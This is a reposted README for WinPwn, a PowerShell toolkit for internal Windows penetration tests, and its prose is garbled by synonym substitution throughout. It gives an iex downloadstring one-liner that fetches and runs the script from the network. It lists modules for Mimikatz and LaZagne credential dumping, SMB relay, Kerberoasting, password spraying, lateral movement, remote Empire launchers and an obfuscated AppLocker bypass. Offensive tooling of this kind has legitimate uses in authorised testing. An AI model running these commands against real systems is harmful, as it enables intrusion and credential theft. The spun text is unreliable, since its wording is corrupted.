Winpwn - Automation For Internal Windows Penetrationtest


In many past times internal penetration tests I frequently had problems alongside the existing Powershell Recon / Exploitation scripts due to missing proxy support. For this argue I wrote my ain script alongside automatic proxy recognition in addition to integration. The script is to a greater extent than frequently than non based on well-known large other offensive safety Powershell projects. I exclusively charge them 1 after the other into RAM via IEX Downloadstring in addition to partially automate the execution to salve time.
Yes it is non a C# in addition to it may hold out flagged past times antivirus solutions. Windows Defender for illustration blocks merely about of the known scripts/functions.
Different local recon modules, domain recon modules, pivilege escalation in addition to exploitation modules. Any suggestions, feedback in addition to comments are welcome!
Just Import the Modules alongside "Import-Module .\WinPwn_v0.7.ps1" or alongside iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')

Functions available after Import:

  1. WinPwn -> Guides the user through all functions/Modules alongside uncomplicated questions.

  2. Inveigh -> Executes Inveigh inward a novel Console window (https://github.com/Kevin-Robertson/Inveigh), SMB-Relay attacks alongside Session administration afterwards

  3. sessionGopher -> Executes Sessiongopher in addition to Asking for parameters (https://github.com/Arvanaghi/SessionGopher)

  4. Mimikatzlocal -> Executes Invoke-WCMDump in addition to Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit)

  5. localreconmodules -> Executes Get-Computerdetails in addition to Just merely about other Windows Privilege escalation script + Winspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS)

  6. JAWS -> Just merely about other Windows Privilege Escalation script gets executed

  7. domainreconmodules -> Different Powerview situal awareness functions larn executed in addition to the output stored on disk. In Addition a Userlist for DomainpasswordSpray gets stored on disk. An AD-Report is generated inward CSV Files (or XLS if excel is installed) alongside ADRecon. (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray)

  8. Privescmodules -> Executes dissimilar privesc scripts inward retentiveness (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump)

  9. lazagnemodule -> Downloads in addition to executes lazagne.exe (if non detected past times AV) (https://github.com/AlessandroZ/LaZagne)

  10. latmov -> Searches for Systems alongside Admin-Access inward the domain for lateral movement. Mass-Mimikatz tin terminate hold out used after for the constitute systems. Domainpassword-Spray for novel Credentials tin terminate besides hold out used here.

  11. empirelauncher -> Launch powershell empire oneliner on remote Systems (https://github.com/EmpireProject/Empire)

  12. shareenumeration -> Invoke-Filefinder in addition to Invoke-Sharefinder from Powerview (Powersploit)

  13. groupsearch -> Get-DomainGPOUserLocalGroupMapping - expose Systems where yous convey Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit)

  14. Kerberoasting -> Executes Invoke-Kerberoast inward a novel window in addition to stores the hashes for afterwards cracking

  15. isadmin -> Checks for local admin access on the local system

  16. Sharphound -> Downloads Sharphound in addition to collects Information for the Bloodhound DB

  17. adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record in addition to run Inveigh for volume hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard)
The "oBEJHzXyARrq.exe"-Executable is an obfuscated Version of jaredhaights PSAttack Tool for Applocker/PS-Restriction Bypass (https://github.com/jaredhaight/PSAttack).
Todo:
  • Get the scripts from my ain creds repository (https://github.com/SecureThisShit/Creds) to hold out independent from changes inward the original repositories.
  • Proxy Options via PAC-File are non correctly constitute inward the moment.

Legal disclaimer:
Usage of WinPwn for attacking targets without prior usual consent is illegal. It's the halt user's responsibleness to obey all applicable local, acre in addition to federal laws. Developers assume no liability in addition to are non responsible for whatever misuse or harm caused past times this program. Only usage for educational purposes.